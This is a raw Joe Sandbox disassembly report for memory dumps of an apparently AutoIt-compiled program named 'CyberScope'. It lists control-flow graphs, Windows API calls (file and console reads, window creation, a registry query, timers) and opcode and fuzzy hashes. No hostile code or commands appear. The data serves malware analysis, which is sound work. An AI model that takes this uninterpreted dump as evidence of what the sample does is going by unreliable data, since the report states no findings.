                                                                                    • Instruction ID: 8acc3b3ac151355b321892b0457b01b8e709bbbb62dfed0df09d3d40fda080dd
                                                                                    • Opcode Fuzzy Hash: 22a72dcd1078a742d25a020d57b916bc087b66cfe78d3d929e13ad42fb70e94f
                                                                                    • Instruction Fuzzy Hash: C671ACB0911A00DEC7A8DF69FDAD6153AE4FB58344390C12AE01AC72B2EBB0458DCF65

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1481 1c90c5-1c90d5 1482 1c90ef-1c90f1 1481->1482 1483 1c90d7-1c90ea call 1bf636 call 1bf649 1481->1483 1485 1c9459-1c9466 call 1bf636 call 1bf649 1482->1485 1486 1c90f7-1c90fd 1482->1486 1500 1c9471 1483->1500 1505 1c946c call 1c2b5c 1485->1505 1486->1485 1489 1c9103-1c912e 1486->1489 1489->1485 1492 1c9134-1c913d 1489->1492 1493 1c913f-1c9152 call 1bf636 call 1bf649 1492->1493 1494 1c9157-1c9159 1492->1494 1493->1505 1498 1c915f-1c9163 1494->1498 1499 1c9455-1c9457 1494->1499 1498->1499 1504 1c9169-1c916d 1498->1504 1502 1c9474-1c9479 1499->1502 1500->1502 1504->1493 1507 1c916f-1c9186 1504->1507 1505->1500 1510 1c9188-1c918b 1507->1510 1511 1c91a3-1c91ac 1507->1511 1512 1c918d-1c9193 1510->1512 1513 1c9195-1c919e 1510->1513 1514 1c91ae-1c91c5 call 1bf636 call 1bf649 call 1c2b5c 1511->1514 1515 1c91ca-1c91d4 1511->1515 1512->1513 1512->1514 1518 1c923f-1c9259 1513->1518 1545 1c938c 1514->1545 1516 1c91db-1c91f9 call 1c3b93 call 1c2d38 * 2 1515->1516 1517 1c91d6-1c91d8 1515->1517 1554 1c91fb-1c9211 call 1bf649 call 1bf636 1516->1554 1555 1c9216-1c923c call 1c97a4 1516->1555 1517->1516 1520 1c932d-1c9336 call 1cfc1b 1518->1520 1521 1c925f-1c926f 1518->1521 1532 1c9338-1c934a 1520->1532 1533 1c93a9 1520->1533 1521->1520 1526 1c9275-1c9277 1521->1526 1526->1520 1530 1c927d-1c92a3 1526->1530 1530->1520 1535 1c92a9-1c92bc 1530->1535 1532->1533 1538 1c934c-1c935b GetConsoleMode 1532->1538 1537 1c93ad-1c93c5 ReadFile 1533->1537 1535->1520 1540 1c92be-1c92c0 1535->1540 1542 1c93c7-1c93cd 1537->1542 1543 1c9421-1c942c GetLastError 1537->1543 1538->1533 1544 1c935d-1c9361 1538->1544 1540->1520 1546 1c92c2-1c92ed 1540->1546 1542->1543 1550 1c93cf 1542->1550 1548 1c942e-1c9440 call 1bf649 call 1bf636 1543->1548 1549 1c9445-1c9448 1543->1549 1544->1537 1551 1c9363-1c937d ReadConsoleW 1544->1551 1552 1c938f-1c9399 call 1c2d38 1545->1552 1546->1520 1553 1c92ef-1c9302 1546->1553 1548->1545 1561 1c944e-1c9450 1549->1561 1562 1c9385-1c938b call 1bf613 1549->1562 1557 1c93d2-1c93e4 1550->1557 1559 1c939e-1c93a7 1551->1559 1560 1c937f GetLastError 1551->1560 1552->1502 1553->1520 1564 1c9304-1c9306 1553->1564 1554->1545 1555->1518 1557->1552 1567 1c93e6-1c93ea 1557->1567 1559->1557 1560->1562 1561->1552 1562->1545 1564->1520 1571 1c9308-1c9328 1564->1571 1575 1c93ec-1c93fc call 1c8de1 1567->1575 1576 1c9403-1c940e 1567->1576 1571->1520 1586 1c93ff-1c9401 1575->1586 1581 1c941a-1c941f call 1c8c21 1576->1581 1582 1c9410 call 1c8f31 1576->1582 1587 1c9415-1c9418 1581->1587 1582->1587 1586->1552 1587->1586
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fccc3334802bb47769c4e31e9a4b6171e4c836bf7b320055425b0f175123fe9b
                                                                                    • Instruction ID: 6e4025b9135bbd3fc4ff95b5f220aa4796f68e8e2ff88c0be618cda741415920
                                                                                    • Opcode Fuzzy Hash: fccc3334802bb47769c4e31e9a4b6171e4c836bf7b320055425b0f175123fe9b
                                                                                    • Instruction Fuzzy Hash: 28C1D270904289AFDF15DFE8D849FADBBB0BF29310F18409DE854AB292C730D942CB61

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1589 1935b3-193623 CreateWindowExW * 2 ShowWindow * 2
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001935E1
                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00193602
                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00193368,?), ref: 00193616
                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00193368,?), ref: 0019361F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateShow
                                                                                    • String ID: AutoIt v3$edit
                                                                                    • API String ID: 1584632944-3779509399
                                                                                    • Opcode ID: 54caa72438cef76f955d8500fcb59c13c5fcdd0b8c27e99dea60e076173544ad
                                                                                    • Instruction ID: 2275164cb4b91987a54721986e6a3f905248ef416df614794c89dc080a4e0d28
                                                                                    • Opcode Fuzzy Hash: 54caa72438cef76f955d8500fcb59c13c5fcdd0b8c27e99dea60e076173544ad
                                                                                    • Instruction Fuzzy Hash: 84F03A70A10294BAEB3107537C0CE372EBDD7C6F50B10405EF904A72A0C2A91869DAB0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1590 201196-2011bf InterlockedExchange 1591 2011c1-2011c8 call 1b017b 1590->1591 1592 2011cd-2011f6 call 1b017b ReadFile 1590->1592 1591->1592 1597 2011fc-201200 1592->1597 1598 2012ae-2012b2 1592->1598 1599 201206-20121b EnterCriticalSection 1597->1599 1600 2012a8-2012ab 1597->1600 1601 2012c1-2012d0 InterlockedExchange 1598->1601 1602 2012b4-2012c0 call 1b0184 1598->1602 1603 201269-2012a2 call 1b1190 LeaveCriticalSection ReadFile 1599->1603 1604 20121d-20122c 1599->1604 1600->1598 1602->1601 1603->1597 1603->1600 1607 201234-201266 call 1d2430 call 1b017b call 1b1190 call 1b0184 1604->1607 1608 20122e 1604->1608 1607->1603 1608->1607
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 002011B3
                                                                                    • ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 002011EE
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0020120A
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00201283
                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0020129A
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 002012C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 3368777196-0
                                                                                    • Opcode ID: 1f5239a5b0eaaffd0e3b42e6d5822530de8bdc978f5ca6eaaa7d8d0485311b4e
                                                                                    • Instruction ID: 7e9bbb82536386a4472ff9db2784546ce407096ca92a9af98739a3756a50e539
                                                                                    • Opcode Fuzzy Hash: 1f5239a5b0eaaffd0e3b42e6d5822530de8bdc978f5ca6eaaa7d8d0485311b4e
                                                                                    • Instruction Fuzzy Hash: 95416F71900205EFDF059FA4DC85AAAB7B8FF04310F1480A5ED049A296D730DE61DBA4

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001D5287
                                                                                      • Part of subcall function 00198577: _wcslen.LIBCMT ref: 0019858A
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00196299
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                    • String ID: Line %d: $AutoIt -
                                                                                    • API String ID: 2289894680-4094128768
                                                                                    • Opcode ID: 4ec703e3280d87e8c7a7859e6107ae7998da2bedb8775a9c2f95941915632767
                                                                                    • Instruction ID: d87de992d6715fd994bcc6a1f6e5e455e45b85d9c0877a8d1be609a59a69eac5
                                                                                    • Opcode Fuzzy Hash: 4ec703e3280d87e8c7a7859e6107ae7998da2bedb8775a9c2f95941915632767
                                                                                    • Instruction Fuzzy Hash: D341C871408304AECB15EB60EC45EEF77ECAF65310F10451EF599921A1EF74964DC792

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1670 1958cb-1958d6 1671 195948-19594a 1670->1671 1672 1958d8-1958dd 1670->1672 1673 19593b-19593e 1671->1673 1672->1671 1674 1958df-1958f7 RegOpenKeyExW 1672->1674 1674->1671 1675 1958f9-195918 RegQueryValueExW 1674->1675 1676 19591a-195925 1675->1676 1677 19592f-19593a RegCloseKey 1675->1677 1678 19593f-195946 1676->1678 1679 195927-195929 1676->1679 1677->1673 1680 19592d 1678->1680 1679->1680 1680->1677
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001958BE,SwapMouseButtons,00000004,?), ref: 001958EF
                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001958BE,SwapMouseButtons,00000004,?), ref: 00195910
                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,001958BE,SwapMouseButtons,00000004,?), ref: 00195932
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: Control Panel\Mouse
                                                                                    • API String ID: 3677997916-824357125
                                                                                    • Opcode ID: e726bee40afcf22d35175191fc600854900f4959ae122113b0aa9b92f189776d
                                                                                    • Instruction ID: 231a3433a70f4a4f244d526906d1781bdea36f81cf936e36c18c45e02bede4f9
                                                                                    • Opcode Fuzzy Hash: e726bee40afcf22d35175191fc600854900f4959ae122113b0aa9b92f189776d
                                                                                    • Instruction Fuzzy Hash: 7B117C75510618FFEF228FA4DC84EAE7BB9EF01764F105419F801E7220E3319E419760
                                                                                    APIs
                                                                                    • TranslateMessage.USER32(?), ref: 0019F27B
                                                                                    • DispatchMessageW.USER32(?), ref: 0019F289
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0019F29F
                                                                                    • Sleep.KERNEL32(0000000A), ref: 0019F2B1
                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 001E32D8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                    • String ID: (&
                                                                                    • API String ID: 3288985973-1801568203
                                                                                    • Opcode ID: 992d4b731ba3c60532f4840f7efade03c8796edf6b62da443effeab2d8b6a63b
                                                                                    • Instruction ID: b7cc2661326effac7616017e830dfd12019c9e8375487c6303c106596d49cf2a
                                                                                    • Opcode Fuzzy Hash: 992d4b731ba3c60532f4840f7efade03c8796edf6b62da443effeab2d8b6a63b
                                                                                    • Instruction Fuzzy Hash: BDF05E30604385ABEB74CBA0DC4DFAA73ACAB85300F504929E25AD30C0DB74E589CB26
                                                                                    APIs
                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 001D413B
                                                                                      • Part of subcall function 00195851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001955D1,?,?,001D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00195871
                                                                                      • Part of subcall function 00193A57: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00193A76
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                    • String ID: X$`u%
                                                                                    • API String ID: 779396738-2961889706
                                                                                    • Opcode ID: a46b57ee6d478e522a1b9f6852c5d4adb057125ca1e41b0f024b0889e34558c9
                                                                                    • Instruction ID: 205c3392c265177ddeabfe9ef8f7402766cf08677ab93e077bf505e4b589ce70
                                                                                    • Opcode Fuzzy Hash: a46b57ee6d478e522a1b9f6852c5d4adb057125ca1e41b0f024b0889e34558c9
                                                                                    • Instruction Fuzzy Hash: D0218171A002589BDF159F98D805BEE7BF8AF59304F00805AE945B7241DBB49A8D8FA1
                                                                                    APIs
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 001B09D8
                                                                                      • Part of subcall function 001B3614: RaiseException.KERNEL32(?,?,?,001B09FA,75912E40,?,?,?,?,?,?,?,001B09FA,?,00259758), ref: 001B3674
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 001B09F5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                    • String ID: Unknown exception
                                                                                    • API String ID: 3476068407-410509341
                                                                                    • Opcode ID: 4af20f2aebd8ec8e79482e03fa778bd259c53176b3cff8733493e3d9bd79f86c
                                                                                    • Instruction ID: 92036f3216d86224bcc401e9321a62013df720805be29db057d891526f51ecb4
                                                                                    • Opcode Fuzzy Hash: 4af20f2aebd8ec8e79482e03fa778bd259c53176b3cff8733493e3d9bd79f86c
                                                                                    • Instruction Fuzzy Hash: 00F0F63490020CB7CB06BAA9DC469EF776C5E19354B604121FD28965E2FB71EA69C6D0
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00218D52
                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00218D59
                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00218F3A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 146820519-0
                                                                                    • Opcode ID: 1275548698a2b0572543d2b666e044928379f895cba99571e82546b93206ee53
                                                                                    • Instruction ID: d47d025b527f823c674f2f5cf96b86ec86fdd47838f41a3a8cae8cd9eda11a23
                                                                                    • Opcode Fuzzy Hash: 1275548698a2b0572543d2b666e044928379f895cba99571e82546b93206ee53
                                                                                    • Instruction Fuzzy Hash: 91126C71A183019FC714CF28C484B6ABBE5BF98314F14895DF8898B292DB71E995CF92
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$_strcat
                                                                                    • String ID:
                                                                                    • API String ID: 306214811-0
                                                                                    • Opcode ID: 2da4c9b093d406e97b58e120a59c27d7fce307c184bf559aab65aabde0278611
                                                                                    • Instruction ID: a3966b712e4066a700830edd9d0b5836daaadba321c20d1dc9a18e04ec8007ae
                                                                                    • Opcode Fuzzy Hash: 2da4c9b093d406e97b58e120a59c27d7fce307c184bf559aab65aabde0278611
                                                                                    • Instruction Fuzzy Hash: C6A16E31614505DFCB18DF18D4E19A9BBE1FF69314B2084AEE84A8F292DB31ED91CBC0
                                                                                    APIs
                                                                                      • Part of subcall function 001961A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00196299
                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 001AFD36
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001AFD45
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001EFE33
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                                    • String ID:
                                                                                    • API String ID: 3500052701-0
                                                                                    • Opcode ID: 0f3d722fe663c00d83379e37e49a59961fca19c91cba1d74e56618e4f1860f82
                                                                                    • Instruction ID: 7c9bf3e3fc1a5d0ee9e4842e34e169250d195a344d2c2464a7339ca8a53f576f
                                                                                    • Opcode Fuzzy Hash: 0f3d722fe663c00d83379e37e49a59961fca19c91cba1d74e56618e4f1860f82
                                                                                    • Instruction Fuzzy Hash: C631D971904784AFEB32CF65D8457EBBBECAB02304F1004ADE9D957242C3746A86CB51
                                                                                    APIs
                                                                                    • CloseHandle.KERNELBASE(00000000,00000000,?,?,001C894C,?,00259CE8,0000000C), ref: 001C8A84
                                                                                    • GetLastError.KERNEL32(?,001C894C,?,00259CE8,0000000C), ref: 001C8A8E
                                                                                    • __dosmaperr.LIBCMT ref: 001C8AB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                    • String ID:
                                                                                    • API String ID: 2583163307-0
                                                                                    • Opcode ID: f3f9b02bac994be3ab2897874378e03013511b89c922ae4822c4637344abf81a
                                                                                    • Instruction ID: 91b02606c1d305b0a062240063ecfc2a5a2257fb7c75a58194672956d4fc5be9
                                                                                    • Opcode Fuzzy Hash: f3f9b02bac994be3ab2897874378e03013511b89c922ae4822c4637344abf81a
                                                                                    • Instruction Fuzzy Hash: BC0126326056606AC7246274ACCAF7E774A4BF1B34F2A025EF8148B1D2DF75EDC14590
                                                                                    APIs
                                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,001C97BA,FF8BC369,00000000,00000002,00000000), ref: 001C9744
                                                                                    • GetLastError.KERNEL32(?,001C97BA,FF8BC369,00000000,00000002,00000000,?,001C5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,001B6F41), ref: 001C974E
                                                                                    • __dosmaperr.LIBCMT ref: 001C9755
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                    • String ID:
                                                                                    • API String ID: 2336955059-0
                                                                                    • Opcode ID: e0a4edb6e9d13dd9066a5c162c200c67ac3c3e03ff16e01ab51219f19706d3c6
                                                                                    • Instruction ID: 3e54539d6c9cee43fa0c831176fe3babca3195d6648560d62ea7e07add67b670
                                                                                    • Opcode Fuzzy Hash: e0a4edb6e9d13dd9066a5c162c200c67ac3c3e03ff16e01ab51219f19706d3c6
                                                                                    • Instruction Fuzzy Hash: A7014C32620614BBCB159F99EC0EDAE3B2AEB95730B24024DF8119B190EB70DD529FD0
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,00200B03,00000000,?,00000000,?,001D3A00,00000000), ref: 00200D2E
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00200B03,00000000,?,00000000,?,001D3A00,00000000), ref: 00200D36
                                                                                    • DuplicateHandle.KERNELBASE(00000000,?,00200B03,00000000,?,00000000,?,001D3A00,00000000), ref: 00200D3D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
